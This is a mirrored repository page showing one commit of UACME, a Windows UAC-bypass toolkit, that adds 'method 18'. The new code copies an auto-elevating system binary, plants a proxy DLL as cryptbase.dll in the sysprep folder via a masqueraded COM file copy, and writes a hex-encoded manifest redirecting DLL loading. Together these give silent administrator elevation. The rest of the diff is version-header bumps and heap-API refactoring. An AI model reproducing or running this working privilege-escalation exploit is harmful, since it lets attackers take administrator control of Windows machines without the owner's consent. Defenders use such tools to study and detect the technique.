Rooba
/
UACME
mirror of https://github.com/hfiref0x/UACME.git
1
1
Fork 0
Code Issues Packages Projects Releases Wiki Activity

v 2.2.0 

method 18 added
This commit is contained in:
hfiref0x 2016-05-29 15:05:10 +07:00
parent 942dbd3d21
commit 95ec4bec70
29 changed files with 403 additions and 114 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
.gitattributes vendored
View File

@ -1,17 +0,0 @@
# Auto detect text files and perform LF normalization
* text=auto
# Custom for Visual Studio
*.cs diff=csharp
# Standard to msysgit
*.doc diff=astextplain
*.DOC diff=astextplain
*.docx diff=astextplain
*.DOCX diff=astextplain
*.dot diff=astextplain
*.DOT diff=astextplain
*.pdf diff=astextplain
*.PDF diff=astextplain
*.rtf diff=astextplain
*.RTF diff=astextplain

BIN
Compiled/Akagi32.exe
View File

Binary file not shown.

BIN
Compiled/Akagi64.exe
View File

Binary file not shown.

BIN
Source/Akagi/Resource.rc
View File

Binary file not shown.

4
Source/Akagi/apphelp.h
View File

@ -4,9 +4,9 @@
*
* TITLE: APPHELP.H
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 14 Apr 2016
* DATE: 20 Apr 2016
*
* Application Compatibility Helper routines and definitions.
*

7
Source/Akagi/carberp.c
View File

@ -4,9 +4,9 @@
*
* TITLE: CARBERP.C
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 16 Apr 2016
* DATE: 22 Apr 2016
*
* Tweaked Carberp methods.
* Original Carberp is exploiting mcx2prov.exe in ehome.
@ -83,6 +83,7 @@ BOOL ucmWusaMethod(
case UacMethodCarberp1:
_strcat(szSourceDll, WDSCORE_DLL);
lpCommandLine = CMD_EXTRACT_MIGWIZ;
_strcat(szTargetProcess, MIGWIZ_DIR);
_strcat(szTargetProcess, MIGWIZ_EXE);
break;
@ -98,7 +99,7 @@ BOOL ucmWusaMethod(
}
if (!PathFileExists(szTargetProcess)) {
OutputDebugString(L"[UCM] Target application not found");
OutputDebugString(T_TARGETNOTFOUND);
return FALSE;
}

4
Source/Akagi/carberp.h
View File

@ -4,9 +4,9 @@
*
* TITLE: CARBERP.H
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 16 Apr 2016
* DATE: 20 Apr 2016
*
* Prototypes and definitions for Carberp method.
*

4
Source/Akagi/compress.c
View File

@ -4,9 +4,9 @@
*
* TITLE: COMPRESS.C
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 16 Apr 2016
* DATE: 28 Apr 2016
*
* Compression support.
*

4
Source/Akagi/compress.h
View File

@ -4,9 +4,9 @@
*
* TITLE: COMPRESS.H
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 15 Apr 2016
* DATE: 20 Apr 2016
*
* Prototypes and definitions for compression.
*

26
Source/Akagi/consts.h
View File

@ -4,9 +4,9 @@
*
* TITLE: CONSTS.H
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 16 Apr 2016
* DATE: 15 May 2016
*
* Global consts definition file.
*
@ -33,9 +33,13 @@
#define IFILEOP_ELEMONIKER L"Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}"
#define T_SDDL_ALL_FOR_EVERYONE L"D:(A;;GA;;;WD)"
#define MANIFEST_EXT L".manifest"
#define ELLOCNAK_MSU L"ellocnak.msu"
#define KERNEL32_DLL L"kernel32.dll"
#define OLE32_DLL L"ole32.dll"
#define SHELL32_DLL L"shell32.dll"
#define APPHELP_DLL L"apphelp.dll"
#define HIBIKI_DLL L"Hibiki.dll"
#define ELLOCNAK_MSU L"ellocnak.msu"
#define HIBIKI_DLL L"Hibiki.dll"
#define SLC_DLL L"SLC.dll"
#define NETUTILS_DLL L"netutils.dll"
#define ACTIONQUEUE_DLL L"ActionQueue.dll"
@ -55,16 +59,17 @@
#define INETMGR_EXE L"InetMgr.exe"
#define MMC_EXE L"mmc.exe"
#define EXPLORER_EXE L"explorer.exe"
#define TASKHOST_EXE L"taskhost.exe"
#define TZSYNC_EXE L"tzsync.exe"
#define SYSPREP_EXE L"sysprep\\sysprep.exe" //always in this dir (appinfo hardcoded)
#define SETUPSQM_EXE L"oobe\\setupsqm.exe" //always in this dir
#define MIGWIZ_EXE L"migwiz.exe"
#define SPINSTALL_EXE L"spinstall.exe"
#define EVENTVWR_MSC L"eventvwr.msc"
#define SYSPREP_DIR L"sysprep\\"
#define INETSRV_DIR L"inetsrv\\"
#define WBEM_DIR L"wbem\\"
#define SYSPREP_EXE L"sysprep\\sysprep.exe" //always in this dir (appinfo hardcoded)
#define SETUPSQM_EXE L"oobe\\setupsqm.exe" //always in this dir
#define MIGWIZ_EXE L"migwiz\\migwiz.exe" //always in this dir
#define KERNEL32_DLL L"kernel32.dll"
#define OLE32_DLL L"ole32.dll"
#define SHELL32_DLL L"shell32.dll"
#define MIGWIZ_DIR L"migwiz\\"
#define RUNAS_VERB L"runas"
#define APPCMDLINE L"hawawawa"
@ -78,6 +83,7 @@
#define UACFIX L"This method fixed/unavailable in the current version of Windows, do you still want to continue?"
#define T_AKAGI_KEY L"Software\\Akagi"
#define T_AKAGI_PARAM L"LoveLetter"
#define T_TARGETNOTFOUND L"Target application not found"
//
// Global const

6
Source/Akagi/global.h
View File

@ -4,9 +4,9 @@
*
* TITLE: GLOBAL.H
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 16 Apr 2016
* DATE: 01 May 2016
*
* Common header file for the program support routines.
*
@ -56,7 +56,6 @@
#define KONGOU_ID IDR_KONGOU32
#endif
typedef enum _UACBYPASSMETHOD {
UacMethodSysprep1 = 1,
UacMethodSysprep2,
@ -75,6 +74,7 @@ typedef enum _UACBYPASSMETHOD {
UacMethodGeneric,
UacMethodGWX,
UacMethodSysprep4,
UacMethodManifest,
UacMethodMax
} UACBYPASSMETHOD;

10
Source/Akagi/gootkit.c
View File

@ -5,9 +5,9 @@
*
* TITLE: GOOTKIT.C
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 16 Apr 2016
* DATE: 20 May 2016
*
* Gootkit based AutoElevation using AppCompat.
*
@ -379,8 +379,8 @@ BOOL ucmShimPatch(
if (epRVA == 0) {
break;
}
tmp = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 32 * 1024);
tmp = HeapAlloc(g_ctx.Peb->ProcessHeap, HEAP_ZERO_MEMORY, 32 * 1024);
if (tmp != NULL) {
patchbits = (PPATCHBITS)tmp;
sz = 0;
@ -392,7 +392,7 @@ BOOL ucmShimPatch(
patchbits->ActionSize = sizeof(PATCHBITS) + patchbits->PatternSize;
sz += patchbits->ActionSize;
SdbWriteBinaryTag(hpdb, TAG_PATCH_BITS, tmp, sz);
HeapFree(GetProcessHeap(), 0, tmp);
HeapFree(g_ctx.Peb->ProcessHeap, 0, tmp);
}
SdbEndWriteListTag(hpdb, patchref); // end LIBRARY-PATCH

5
Source/Akagi/gootkit.h
View File

@ -1,14 +1,13 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2014 - 2016,
* (C) Original idea (?) mzH,
* (C) FixIT Shim Patches by Jon Erickson
*
* TITLE: GOOTKIT.H
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 16 Apr 2016
* DATE: 20 Apr 2016
*
* Prototypes and definitions for Gootkit method.
*

199
Source/Akagi/hybrids.c
View File

@ -4,9 +4,9 @@
*
* TITLE: HYBRIDS.C
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 16 Apr 2016
* DATE: 25 May 2016
*
* Hybrid UAC bypass methods.
*
@ -18,6 +18,7 @@
*******************************************************************************/
#include "global.h"
#include "makecab.h"
#include "manifest.h"
ELOAD_PARAMETERS_SIREFEF g_ElevParamsSirefef;
@ -166,7 +167,7 @@ BOOL ucmWinSATMethod(
// Copy winsat to temp directory
if (!CopyFile(szSource, szDest, FALSE)) {
OutputDebugString(L"[UCM] Target application not found");
OutputDebugString(T_TARGETNOTFOUND);
break;
}
@ -231,8 +232,6 @@ BOOL ucmWinSATMethod(
if (bResult) {
NtYieldExecution();//put your signature here
//run winsat
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
_strcpy(szBuffer, g_ctx.szSystemDirectory);
@ -638,3 +637,193 @@ BOOL ucmGWX(
}
return bResult;
}
/*
* ucmAutoElevateManifestDropDll
*
* Purpose:
*
* Drop target dll for ucmAutoElevateManifest.
*
*/
BOOL ucmAutoElevateManifestDropDll(
PVOID ProxyDll,
DWORD ProxyDllSize
)
{
WCHAR szDest[MAX_PATH * 2];
WCHAR szSource[MAX_PATH * 2];
RtlSecureZeroMemory(szSource, sizeof(szSource));
_strcpy(szSource, g_ctx.szTempDirectory);
_strcat(szSource, CRYPTBASE_DLL);
if (!supWriteBufferToFile(szSource, ProxyDll, ProxyDllSize)) {
return FALSE;
}
RtlSecureZeroMemory(szDest, sizeof(szDest));
_strcpy(szDest, g_ctx.szSystemDirectory);
_strcat(szDest, SYSPREP_DIR);
return ucmMasqueradedCopyFileCOM(szSource, szDest);
}
/*
* ucmAutoElevateManifestW7
*
* Purpose:
*
* Special case for Windows 7.
*
*/
BOOL ucmAutoElevateManifestW7(
PVOID ProxyDll,
DWORD ProxyDllSize
)
{
DWORD d;
BOOL bResult = FALSE, bCond = FALSE;
WCHAR szDest[MAX_PATH * 2];
WCHAR szSource[MAX_PATH * 2];
LPWSTR lpApplication = NULL;
do {
RtlSecureZeroMemory(szSource, sizeof(szSource));
RtlSecureZeroMemory(szDest, sizeof(szDest));
_strcpy(szSource, g_ctx.szSystemDirectory);
_strcpy(szDest, g_ctx.szTempDirectory);
lpApplication = TASKHOST_EXE;//doesn't really matter, Yuubari module lists multiple targets
_strcat(szSource, lpApplication);
_strcat(szDest, lpApplication);
// Copy target to temp directory
if (!CopyFile(szSource, szDest, FALSE)) {
d = GetLastError();
OutputDebugString(T_TARGETNOTFOUND);
break;
}
_strcpy(szSource, szDest);
// Copy target app to windir
RtlSecureZeroMemory(szDest, sizeof(szDest));
_strcpy(szDest, USER_SHARED_DATA->NtSystemRoot);
_strcat(szDest, TEXT("\\"));
bResult = ucmMasqueradedCopyFileCOM(szSource, szDest);
if (!bResult) {
break;
}
bResult = ucmAutoElevateManifestDropDll(ProxyDll, ProxyDllSize);
if (!bResult) {
break;
}
//put target manifest
RtlSecureZeroMemory(szSource, sizeof(szSource));
_strcpy(szSource, g_ctx.szTempDirectory);
_strcat(szSource, lpApplication);
_strcat(szSource, MANIFEST_EXT);
if (!supWriteBufferToFile(szSource, (PVOID)ManifestData, sizeof(ManifestData))) {
break;
}
RtlSecureZeroMemory(szDest, sizeof(szDest));
_strcpy(szDest, USER_SHARED_DATA->NtSystemRoot);
bResult = ucmMasqueradedCopyFileCOM(szSource, szDest);
if (!bResult) {
break;
}
_strcat(szDest, L"\\");
_strcat(szDest, lpApplication);
bResult = supRunProcess(szDest, NULL);
} while (bCond);
return bResult;
}
/*
* ucmAutoElevateManifest
*
* Purpose:
*
* Bypass UAC by abusing appinfo whitelist and SXS undocumented feature.
* Ironically revealed by Microsoft itself in their attempt to fix UAC exploit.
* Supported at Windows 7 minimum (older versions not checked).
*
*/
BOOL ucmAutoElevateManifest(
PVOID ProxyDll,
DWORD ProxyDllSize
)
{
BOOL bResult = FALSE, bCond = FALSE;
WCHAR szDest[MAX_PATH * 2];
WCHAR szSource[MAX_PATH * 2];
LPWSTR lpApplication = NULL;
if ((ProxyDll == NULL) || (ProxyDllSize == 0))
return bResult;
do {
if (g_ctx.dwBuildNumber < 9600) {
bResult = ucmAutoElevateManifestW7(ProxyDll, ProxyDllSize);
break;
}
RtlSecureZeroMemory(szSource, sizeof(szSource));
RtlSecureZeroMemory(szDest, sizeof(szDest));
_strcpy(szSource, g_ctx.szSystemDirectory);
_strcpy(szDest, g_ctx.szTempDirectory);
_strcat(szSource, TZSYNC_EXE); //doesn't really matter, Yuubari module lists multiple targets
lpApplication = MIGWIZ_EXE;
_strcat(szDest, lpApplication);
// Copy target to temp directory
if (!CopyFile(szSource, szDest, FALSE)) {
OutputDebugString(T_TARGETNOTFOUND);
break;
}
_strcpy(szSource, szDest);
// Copy target app to home
RtlSecureZeroMemory(szDest, sizeof(szDest));
_strcpy(szDest, g_ctx.szSystemDirectory);
bResult = ucmMasqueradedCopyFileCOM(szSource, szDest);
if (!bResult) {
break;
}
bResult = ucmAutoElevateManifestDropDll(ProxyDll, ProxyDllSize);
if (!bResult) {
break;
}
//put target manifest
RtlSecureZeroMemory(szSource, sizeof(szSource));
_strcpy(szSource, g_ctx.szTempDirectory);
_strcat(szSource, lpApplication);
_strcat(szSource, MANIFEST_EXT);
if (!supWriteBufferToFile(szSource, (PVOID)ManifestData, sizeof(ManifestData))) {
break;
}
RtlSecureZeroMemory(szDest, sizeof(szDest));
_strcpy(szDest, g_ctx.szSystemDirectory);
bResult = ucmMasqueradedCopyFileCOM(szSource, szDest);
if (!bResult) {
break;
}
_strcpy(szDest, g_ctx.szSystemDirectory);
_strcat(szDest, lpApplication);
bResult = supRunProcess(szDest, NULL);
} while (bCond);
return bResult;
}

9
Source/Akagi/hybrids.h
View File

@ -4,9 +4,9 @@
*
* TITLE: HYBRIDS.H
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 15 Apr 2016
* DATE: 25 May 2016
*
* Prototypes and definitions for hybrid methods.
*
@ -63,3 +63,8 @@ BOOL ucmGenericAutoelevation(
BOOL ucmGWX(
VOID
);
BOOL ucmAutoElevateManifest(
PVOID ProxyDll,
DWORD ProxyDllSize
);

18
Source/Akagi/main.c
View File

@ -4,9 +4,9 @@
*
* TITLE: MAIN.C
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 16 Apr 2016
* DATE: 25 May 2016
*
* Program entry point.
*
@ -98,7 +98,7 @@ UINT ucmInit(
//fill common data block
RtlSecureZeroMemory(&g_ctx, sizeof(g_ctx));
g_ctx.Peb = RtlGetCurrentPeb();
g_ctx.Peb = NtCurrentPeb();
inst = g_ctx.Peb->ImageBaseAddress;
dwType = 0;
@ -614,6 +614,18 @@ UINT ucmMain()
}
break;
case UacMethodManifest:
#ifndef _DEBUG
if (g_ctx.IsWow64) {
ucmShowMessage(LAZYWOW64UNSUPPORTED);
return ERROR_UNSUPPORTED_TYPE;
}
#endif
if (ucmAutoElevateManifest(g_ctx.PayloadDll, g_ctx.PayloadDllSize)) {
return ERROR_SUCCESS;
}
break;
}
return ERROR_ACCESS_DENIED;

18
Source/Akagi/makecab.c
View File

@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2015
* (C) COPYRIGHT AUTHORS, 2015 - 2016
*
* TITLE: MAKECAB.C
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 15 Apr 2016
* DATE: 25 May 2016
*
* Simplified Cabinet file support for makecab utility replacement.
*
@ -28,8 +28,8 @@
LPVOID DIAMONDAPI fnFCIALLOC(
ULONG cb
)
{
return HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, cb);
{
return HeapAlloc(g_ctx.Peb->ProcessHeap, HEAP_ZERO_MEMORY, cb);
}
VOID DIAMONDAPI fnFCIFREE(
@ -37,7 +37,7 @@ VOID DIAMONDAPI fnFCIFREE(
)
{
if (lpMem) {
HeapFree(GetProcessHeap(), 0, lpMem);
HeapFree(g_ctx.Peb->ProcessHeap, 0, lpMem);
}
}
@ -327,7 +327,7 @@ CABDATA *cabCreate(
return NULL;
}
pCabinet = (PCABDATA)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(CABDATA));
pCabinet = (PCABDATA)HeapAlloc(g_ctx.Peb->ProcessHeap, HEAP_ZERO_MEMORY, sizeof(CABDATA));
if (pCabinet == NULL) {
return NULL;
}
@ -352,7 +352,7 @@ CABDATA *cabCreate(
NULL);
if (pCabinet->hfci == NULL) {
HeapFree(GetProcessHeap(), 0, pCabinet);
HeapFree(g_ctx.Peb->ProcessHeap, 0, pCabinet);
pCabinet = NULL;
}
return pCabinet;
@ -425,5 +425,5 @@ VOID cabClose(
);
FCIDestroy(Cabinet->hfci);
HeapFree(GetProcessHeap(), 0, Cabinet);
HeapFree(g_ctx.Peb->ProcessHeap, 0, Cabinet);
}

4
Source/Akagi/makecab.h
View File

@ -4,9 +4,9 @@
*
* TITLE: MAKECAB.H
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 16 Apr 2016
* DATE: 25 May 2016
*
* Prototypes and definitions for makecab module.
*

85
Source/Akagi/manifest.h Normal file
View File

@ -0,0 +1,85 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
*
* TITLE: MANIFEST.H
*
* VERSION: 2.20
*
* DATE: 25 May 2016
*
* Manifest for dll redirection, originally called "defence-in-depth approach".
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
static const unsigned char ManifestData[1007] = {
0x3C, 0x3F, 0x78, 0x6D, 0x6C, 0x20, 0x76, 0x65, 0x72, 0x73, 0x69, 0x6F, 0x6E, 0x3D, 0x27, 0x31,
0x2E, 0x30, 0x27, 0x20, 0x65, 0x6E, 0x63, 0x6F, 0x64, 0x69, 0x6E, 0x67, 0x3D, 0x27, 0x75, 0x74,
0x66, 0x2D, 0x38, 0x27, 0x20, 0x73, 0x74, 0x61, 0x6E, 0x64, 0x61, 0x6C, 0x6F, 0x6E, 0x65, 0x3D,
0x27, 0x79, 0x65, 0x73, 0x27, 0x3F, 0x3E, 0x0D, 0x0A, 0x3C, 0x61, 0x73, 0x73, 0x65, 0x6D, 0x62,
0x6C, 0x79, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x78, 0x6D, 0x6C, 0x6E, 0x73, 0x3D, 0x22, 0x75,
0x72, 0x6E, 0x3A, 0x73, 0x63, 0x68, 0x65, 0x6D, 0x61, 0x73, 0x2D, 0x6D, 0x69, 0x63, 0x72, 0x6F,
0x73, 0x6F, 0x66, 0x74, 0x2D, 0x63, 0x6F, 0x6D, 0x3A, 0x61, 0x73, 0x6D, 0x2E, 0x76, 0x31, 0x22,
0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x78, 0x6D, 0x6C, 0x6E, 0x73, 0x3A, 0x61, 0x73, 0x6D, 0x76,
0x33, 0x3D, 0x22, 0x75, 0x72, 0x6E, 0x3A, 0x73, 0x63, 0x68, 0x65, 0x6D, 0x61, 0x73, 0x2D, 0x6D,
0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x2D, 0x63, 0x6F, 0x6D, 0x3A, 0x61, 0x73, 0x6D,
0x2E, 0x76, 0x33, 0x22, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x61, 0x6E, 0x69, 0x66, 0x65,
0x73, 0x74, 0x56, 0x65, 0x72, 0x73, 0x69, 0x6F, 0x6E, 0x3D, 0x22, 0x31, 0x2E, 0x30, 0x22, 0x0D,
0x0A, 0x20, 0x20, 0x20, 0x20, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x3C, 0x74, 0x72, 0x75, 0x73,
0x74, 0x49, 0x6E, 0x66, 0x6F, 0x20, 0x78, 0x6D, 0x6C, 0x6E, 0x73, 0x3D, 0x22, 0x75, 0x72, 0x6E,
0x3A, 0x73, 0x63, 0x68, 0x65, 0x6D, 0x61, 0x73, 0x2D, 0x6D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F,
0x66, 0x74, 0x2D, 0x63, 0x6F, 0x6D, 0x3A, 0x61, 0x73, 0x6D, 0x2E, 0x76, 0x33, 0x22, 0x3E, 0x0D,
0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x73, 0x65, 0x63, 0x75, 0x72, 0x69, 0x74, 0x79, 0x3E, 0x0D,
0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x72, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x65,
0x64, 0x50, 0x72, 0x69, 0x76, 0x69, 0x6C, 0x65, 0x67, 0x65, 0x73, 0x3E, 0x0D, 0x0A, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x72, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x65, 0x64,
0x45, 0x78, 0x65, 0x63, 0x75, 0x74, 0x69, 0x6F, 0x6E, 0x4C, 0x65, 0x76, 0x65, 0x6C, 0x0D, 0x0A,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6C, 0x65, 0x76, 0x65,
0x6C, 0x3D, 0x22, 0x72, 0x65, 0x71, 0x75, 0x69, 0x72, 0x65, 0x41, 0x64, 0x6D, 0x69, 0x6E, 0x69,
0x73, 0x74, 0x72, 0x61, 0x74, 0x6F, 0x72, 0x22, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x41, 0x63, 0x63, 0x65, 0x73, 0x73, 0x3D, 0x22,
0x66, 0x61, 0x6C, 0x73, 0x65, 0x22, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x2F,
0x72, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x65, 0x64, 0x50, 0x72, 0x69, 0x76, 0x69, 0x6C, 0x65,
0x67, 0x65, 0x73, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x2F, 0x73, 0x65, 0x63, 0x75,
0x72, 0x69, 0x74, 0x79, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x3C, 0x2F, 0x74, 0x72, 0x75, 0x73, 0x74,
0x49, 0x6E, 0x66, 0x6F, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x3C, 0x61, 0x73, 0x6D, 0x76, 0x33, 0x3A,
0x61, 0x70, 0x70, 0x6C, 0x69, 0x63, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x3E, 0x0D, 0x0A, 0x20, 0x20,
0x20, 0x20, 0x3C, 0x61, 0x73, 0x6D, 0x76, 0x33, 0x3A, 0x77, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x73,
0x53, 0x65, 0x74, 0x74, 0x69, 0x6E, 0x67, 0x73, 0x20, 0x78, 0x6D, 0x6C, 0x6E, 0x73, 0x3D, 0x22,
0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x73, 0x63, 0x68, 0x65, 0x6D, 0x61, 0x73, 0x2E, 0x6D,
0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x53, 0x4D, 0x49,
0x2F, 0x32, 0x30, 0x30, 0x35, 0x2F, 0x57, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x73, 0x53, 0x65, 0x74,
0x74, 0x69, 0x6E, 0x67, 0x73, 0x22, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3C,
0x61, 0x75, 0x74, 0x6F, 0x45, 0x6C, 0x65, 0x76, 0x61, 0x74, 0x65, 0x3E, 0x74, 0x72, 0x75, 0x65,
0x3C, 0x2F, 0x61, 0x75, 0x74, 0x6F, 0x45, 0x6C, 0x65, 0x76, 0x61, 0x74, 0x65, 0x3E, 0x0D, 0x0A,
0x20, 0x20, 0x20, 0x20, 0x3C, 0x2F, 0x61, 0x73, 0x6D, 0x76, 0x33, 0x3A, 0x77, 0x69, 0x6E, 0x64,
0x6F, 0x77, 0x73, 0x53, 0x65, 0x74, 0x74, 0x69, 0x6E, 0x67, 0x73, 0x3E, 0x0D, 0x0A, 0x20, 0x20,
0x3C, 0x2F, 0x61, 0x73, 0x6D, 0x76, 0x33, 0x3A, 0x61, 0x70, 0x70, 0x6C, 0x69, 0x63, 0x61, 0x74,
0x69, 0x6F, 0x6E, 0x3E, 0x0D, 0x0A, 0x20, 0x3C, 0x21, 0x2D, 0x2D, 0x0D, 0x0A, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x59, 0x6F, 0x75, 0x72, 0x20, 0x22, 0x64, 0x65, 0x66, 0x65, 0x6E, 0x63, 0x65,
0x2D, 0x69, 0x6E, 0x2D, 0x64, 0x65, 0x70, 0x74, 0x68, 0x20, 0x61, 0x70, 0x70, 0x72, 0x6F, 0x61,
0x63, 0x68, 0x22, 0x20, 0x69, 0x73, 0x20, 0x61, 0x63, 0x74, 0x75, 0x61, 0x6C, 0x6C, 0x79, 0x20,
0x79, 0x65, 0x74, 0x20, 0x61, 0x6E, 0x6F, 0x74, 0x68, 0x65, 0x72, 0x0D, 0x0A, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x75, 0x6E, 0x64, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x65, 0x64, 0x20,
0x62, 0x61, 0x63, 0x6B, 0x64, 0x6F, 0x6F, 0x72, 0x2E, 0x20, 0x49, 0x20, 0x73, 0x69, 0x6E, 0x63,
0x65, 0x72, 0x65, 0x6C, 0x79, 0x20, 0x68, 0x6F, 0x70, 0x65, 0x20, 0x79, 0x6F, 0x75, 0x20, 0x77,
0x69, 0x6C, 0x6C, 0x20, 0x6E, 0x65, 0x76, 0x65, 0x72, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x64, 0x6F, 0x20, 0x61, 0x6E, 0x79, 0x74, 0x68, 0x69, 0x6E, 0x67, 0x20, 0x6D, 0x6F, 0x72,
0x65, 0x20, 0x63, 0x6F, 0x6D, 0x70, 0x6C, 0x65, 0x78, 0x20, 0x74, 0x68, 0x61, 0x6E, 0x20, 0x63,
0x6F, 0x64, 0x69, 0x6E, 0x67, 0x20, 0x54, 0x65, 0x74, 0x72, 0x69, 0x73, 0x2E, 0x0D, 0x0A, 0x20,
0x20, 0x2D, 0x2D, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x3C, 0x66, 0x69, 0x6C, 0x65, 0x0D, 0x0A, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x6C, 0x6F, 0x61, 0x64, 0x46, 0x72, 0x6F, 0x6D, 0x3D, 0x22, 0x25,
0x73, 0x79, 0x73, 0x74, 0x65, 0x6D, 0x72, 0x6F, 0x6F, 0x74, 0x25, 0x5C, 0x73, 0x79, 0x73, 0x74,
0x65, 0x6D, 0x33, 0x32, 0x5C, 0x73, 0x79, 0x73, 0x70, 0x72, 0x65, 0x70, 0x5C, 0x63, 0x72, 0x79,
0x70, 0x74, 0x62, 0x61, 0x73, 0x65, 0x2E, 0x44, 0x4C, 0x4C, 0x22, 0x0D, 0x0A, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22, 0x63, 0x72, 0x79, 0x70, 0x74, 0x62, 0x61,
0x73, 0x65, 0x2E, 0x44, 0x4C, 0x4C, 0x22, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2F,
0x3E, 0x0D, 0x0A, 0x20, 0x3C, 0x2F, 0x61, 0x73, 0x73, 0x65, 0x6D, 0x62, 0x6C, 0x79, 0x3E
};

4
Source/Akagi/pitou.c
View File

@ -4,9 +4,9 @@
*
* TITLE: PITOU.C
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 16 Apr 2016
* DATE: 25 May 2016
*
* Leo Davidson based IFileOperation auto-elevation.
*

4
Source/Akagi/pitou.h
View File

@ -4,9 +4,9 @@
*
* TITLE: PITOU.H
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 16 Apr 2016
* DATE: 25 May 2016
*
* Prototypes and definitions for Leo Davidson method.
*

4
Source/Akagi/simda.c
View File

@ -4,9 +4,9 @@
*
* TITLE: SIMDA.C
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 16 Apr 2016
* DATE: 22 Apr 2016
*
* Simda based UAC bypass using ISecurityEditor.
*

4
Source/Akagi/simda.h
View File

@ -4,9 +4,9 @@
*
* TITLE: SIMDA.H
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 16 Apr 2016
* DATE: 25 May 2016
*
* Prototypes and definitions for Simda method.
*

10
Source/Akagi/sup.c
View File

@ -4,9 +4,9 @@
*
* TITLE: SUP.C
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 16 Apr 2016
* DATE: 25 May 2016
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@ -184,7 +184,7 @@ HANDLE supRunProcessEx(
}
ccb = (_strlen_w(lpszParameters) * sizeof(WCHAR)) + sizeof(WCHAR);
pszBuffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, ccb);
pszBuffer = HeapAlloc(g_ctx.Peb->ProcessHeap, HEAP_ZERO_MEMORY, ccb);
if (pszBuffer == NULL) {
return NULL;
}
@ -212,7 +212,7 @@ HANDLE supRunProcessEx(
}
} while (cond);
HeapFree(GetProcessHeap(), 0, pszBuffer);
HeapFree(g_ctx.Peb->ProcessHeap, 0, pszBuffer);
